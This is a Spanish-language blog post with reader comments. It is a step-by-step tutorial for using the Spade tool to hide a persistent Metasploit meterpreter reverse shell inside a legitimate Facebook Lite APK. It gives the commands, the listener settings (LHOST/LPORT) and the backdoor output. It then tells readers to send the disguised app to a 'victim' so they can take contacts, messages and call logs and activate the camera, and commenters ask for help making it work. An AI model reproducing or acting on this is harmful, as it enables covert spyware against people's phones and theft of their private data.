jueves, 10 de noviembre de 2016

Generando Payload APK persistente con Spade


Saludos nuevamente mis queridos fieles lectores en esta oportunidad les traigo una herramienta salida del horno llamada "SPADE", esta peculiar herramienta esta desarrollada en Python, su objetivo principal es "Compilar" un Payload en apk mediante una conexión "meterpreter" establecida con el Framework "Metasploit".


Si deseas aprender todo lo referente a metasploit framework, puedes visitar los siguientes enlaces:

http://www.backtrack-omar.com/2014/01/aprendiendo-metasploit-avanzado.html
http://www.backtrack-omar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrack-omar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrack-omar.com/2016/02/dump-skype-account-our-victim-for.html
http://www.backtrack-omar.com/2016/02/bypassear-privilegios-uac-win-10-8-81.html
http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrack-omar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrack-omar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrack-omar.com/2016/02/send-video-youtube-victim-with.html
http://www.backtrack-omar.com/2016/02/compilando-nuestros-payloads-in.html

continuando con el POST, esta herramienta te ahorra el proceso de crear tu payload con extensión .apk en msfvenom o por el mismo metasploit, automatiza todo el proceso, solo debes añadir tu servidor y  tus puertos como normalmente se añaden tanto en un payload como en un Handle.

Descarga:


root@kali:~# git clone https://github.com/suraj-root/spade.git
root@kali:~# cd spade

Luego de descargar y entrar a su carpeta, instalaremos las respectivas librerías para que el software cumpla sus funciones correctamente:

root@kali:~# apt-get install lib32stdc++6 lib32ncurses5 and lib32z1 

Una vez completado la instalación de las librerías, deben descargar un aplicativo "APK", donde insertaremos nuestro payload desconpilando el código y procesando la información de la conexión, que haremos desde ese aplicativo infectado creado en spade que se camuflara con el "apk original" en mi caso escogí "Facebook-lite.apk".

Luego de copiar nuestro "APK" descargado en la carpeta raíz "spade", entraremos en nuestra terminal y añadiremos lo siguiente:

root@kali:~/spade# ./spade.py facebook-lite.apk

Como vemos en las 3 primeras lineas, hemos añadido nuestro archivo llamado "Facebook-lite.apk" correctamente, luego nos sale las siguientes 6 opciones:

[1] android/meterpreter/reverse_http
[2] android/meterpreter/reverse_https
[3] android/meterpreter/reverse_tcp
[4] android/shell/reverse_http
[5] android/shell/reverse_https
[6] android/shell/reverse_tcp
 

Son el tipo de conexión que vamos a establecer para conectarnos desde nuestro servidor en mi caso escogí una session meterpreter reverse_http, la cual indico que estoy trabajando con el protocolo http, en la mayoría de conexión se utiliza el reverse_tcp, pero el resultado sera el mismo.

LHOST> 192.168.1.35    >>>>>>> Nuestra IP
LPORT> 8080                 >>>>>>> Nuestro Puerto de escucha


Luego de establecer nuestra configuración del servidor y el puerto de escucha, automáticamente comenzara el proceso de adicionan de permisos en el administrativos.



cuando me refiero a los permisos administrativos, me refiero que tendremos acceso a establecer todo tipo de servicios del dispositivo, entre ellos "Activar la Webcamp", establecer llamadas, extraer números de contactos, de mensajes, y todo lo demás, es mas se puede decir que tendremos mas privilegios que nuestra victima.

Luego que termine todo el proceso de compilamiento, nos aparece el siguiente mensaje:

[+] Successfully backdoored and saved as facebook-lite-final.apk

quiere decir que nuestro ejecutable apk, se creo correctamente con el nombre "facebook-lite-final.apk", El archivo se encuentra en la misma carpeta spade, luego de ello la subiremos a cualquier gestor de descargas y le enviaremos a nuestro victima, luego nos aparecerá el siguiente mensaje:

Do you want to setup a listener?[y/n]y
le daremos "Y" para que se inicia metasploit framework con nuestra configuración creada de nuestro payload.


una ves que tengamos nuestro servidor en modo de escucha, solo faltaría que nuestra victima "Ejecute" el archivo y automáticamente tendremos acceso a su dispositivo móvil:



Luego que nuestra victima halla instalado nuestro payload, tendremos acceso a su dispositivo.


hemos comprometido el servidor por medio de un ataque POS-explotacion por medio de un payload infectado, como se los comente ustedes pueden extraer datos de contactos, registro de llamadas, de mensajes de texto, activar la webcamp, y ejercer todas las funciones del dispositivo.

Cabe aclarar que este payload se genera de forma persistente, si deseas eliminarlo no podrás hacerlo, ha menos que rootes tu dispositivo y lo elimines por ese medio.


Saludos!!!!!!  


9 comentarios:

  1. Este tipo de "malware" requiere que la victima acepte los permisos , no seria mejor utilizar las recientes investigaciones y lograr escalar privilegios primero ?.

    Saludos!!

    ResponderEliminar
    Respuestas
    1. Buenos días, la instalación es tipica de un APK ordinario el simple hecho que se añada mas "Privilegios" no quiere decir que un usuario "TIPICO" se vaya a dar cuenta, para nada.

      Eh visto que personas con un nivel intermedio descargan app en "PLAYSTORE" que almacena sus tarjetas bancarias y no se quejan en absoluto.

      un ejemplo:

      https://play.google.com/store/apps/details?id=com.cleanmaster.mguard

      Saludos!

      Eliminar
    2. Como tu los has escrito solo el usuario "TIPICO" ,no funcionara con aquellos que son mas observadores.

      Eliminar
    3. de hecho tu vas a ownear a alguien que sea mas observador que tu no crees?, muy aparte de eso que pasa si esa persona tiene un sistema actualizado? el exploit local no serviría y que privilegios tendrías ninguno.

      Saludos.

      Eliminar
  2. Que tal amigo he hecho todo pero no me funciona me podrìas ayudar

    ResponderEliminar
    Respuestas
    1. Hola info,algunas apk no son compatibles puedes ir probando.
      un fuerte abrazo desde Perú.

      Saludos y éxitos.

      Eliminar
  3. Que tal amigo, discula, tendras algun mirror del script?
    En Github ya no esta disponible :(

    ResponderEliminar

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares